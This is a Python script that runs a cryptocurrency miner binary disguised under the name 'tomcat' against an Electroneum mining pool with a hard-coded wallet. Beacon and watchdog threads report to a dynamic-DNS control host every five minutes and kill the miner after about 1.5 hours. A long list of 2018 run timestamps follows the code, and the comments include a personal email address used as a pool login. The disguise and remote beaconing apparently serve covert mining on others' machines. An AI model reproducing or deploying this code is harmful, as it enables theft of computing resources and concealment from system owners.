import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:31:04.650365
#2018-02-17 17:19:05.072905
#2018-02-17 19:07:07.366389
#2018-02-17 20:54:04.007405
#2018-02-17 22:41:08.028442
#2018-02-18 00:25:05.652598
#2018-02-18 02:16:03.631545
#2018-02-18 04:02:05.947218
#2018-02-18 05:53:04.761048
#2018-02-18 07:44:03.369596
#2018-02-18 09:32:01.280292
#2018-02-18 11:18:06.048523
#2018-02-18 13:04:04.700548
#2018-02-18 14:54:04.101114
#2018-02-18 16:42:05.818635
#2018-02-18 18:31:05.227573
#2018-02-18 20:19:01.382312
#2018-02-18 22:04:06.461799
#2018-02-18 23:53:03.444505
#2018-02-19 01:39:01.670466
#2018-02-19 03:27:07.025394
#2018-02-19 05:12:04.401494
#2018-02-19 06:57:01.304141
#2018-02-19 08:46:07.688048
#2018-02-19 10:37:06.589742
#2018-02-19 12:24:04.699459
#2018-02-19 14:11:05.736674
#2018-02-19 16:02:07.052837
#2018-02-19 17:50:14.570199
#2018-02-19 19:38:07.747039
#2018-02-19 21:25:08.009886
#2018-02-19 23:10:09.351464
#2018-02-20 00:57:01.873250
#2018-02-20 02:46:06.924756
#2018-02-20 04:32:08.531572
#2018-02-20 06:16:07.487111
#2018-02-20 08:00:10.750039
#2018-02-20 09:45:10.517970
#2018-02-20 11:29:08.651935
#2018-02-20 13:15:01.434242
#2018-02-20 15:02:06.153451
#2018-02-20 16:46:16.321503
#2018-02-20 18:36:10.683865
#2018-02-20 20:26:02.315932
#2018-02-20 22:12:04.133613
#2018-02-20 23:54:06.486853
#2018-02-21 01:40:07.030298
#2018-02-21 03:29:03.937523
#2018-02-21 05:17:06.376781
#2018-02-21 07:05:08.146687
#2018-02-21 08:51:04.339215
#2018-02-21 10:39:04.845421
#2018-02-21 12:26:06.455339
#2018-02-21 14:12:09.732687
#2018-02-21 15:58:07.682880
#2018-02-21 17:49:06.616092
#2018-02-21 19:35:08.486886
#2018-02-21 21:22:05.919182
#2018-02-21 23:08:08.190162
#2018-02-22 00:57:01.622154
#2018-02-22 02:44:06.391074
#2018-02-22 04:31:04.652349
#2018-02-22 06:16:01.464399
#2018-02-22 08:02:05.410002
#2018-02-22 09:50:04.103734
#2018-02-22 11:34:09.802107
#2018-02-22 13:21:04.683030
#2018-02-22 15:10:10.044682
#2018-02-22 16:55:01.675371
#2018-02-22 18:44:07.458222
#2018-02-22 20:35:07.970584
#2018-02-22 22:20:11.271462
#2018-02-23 00:07:01.306616
#2018-02-23 01:55:05.318215
#2018-02-23 03:46:01.376867
#2018-02-23 05:42:06.863585
#2018-02-23 07:27:06.359271
#2018-02-23 09:33:04.346493
#2018-02-23 11:39:05.470006
#2018-02-23 13:28:02.077188
#2018-02-23 15:13:09.516943
#2018-02-23 17:03:06.862746
#2018-02-23 18:51:10.366071
#2018-02-23 20:37:06.632312
#2018-02-23 22:24:05.142476
#2018-02-24 00:11:04.976198
#2018-02-24 02:02:08.184235
#2018-02-24 03:54:01.928226
#2018-02-24 05:41:04.690517
#2018-02-24 07:32:01.907890
#2018-02-24 09:19:04.841496
#2018-02-24 11:07:02.208109
#2018-02-24 12:56:05.212230
#2018-02-24 14:43:06.462770
#2018-02-24 16:36:06.895639
#2018-02-24 18:25:01.945212
#2018-02-24 20:11:07.759732
#2018-02-24 21:59:06.148073
#2018-02-25 00:59:01.504037
#2018-02-25 03:55:06.651837
#2018-02-25 06:40:06.220182
#2018-02-25 11:36:06.445521
#2018-02-25 13:27:01.633948
#2018-02-25 15:00:03.077004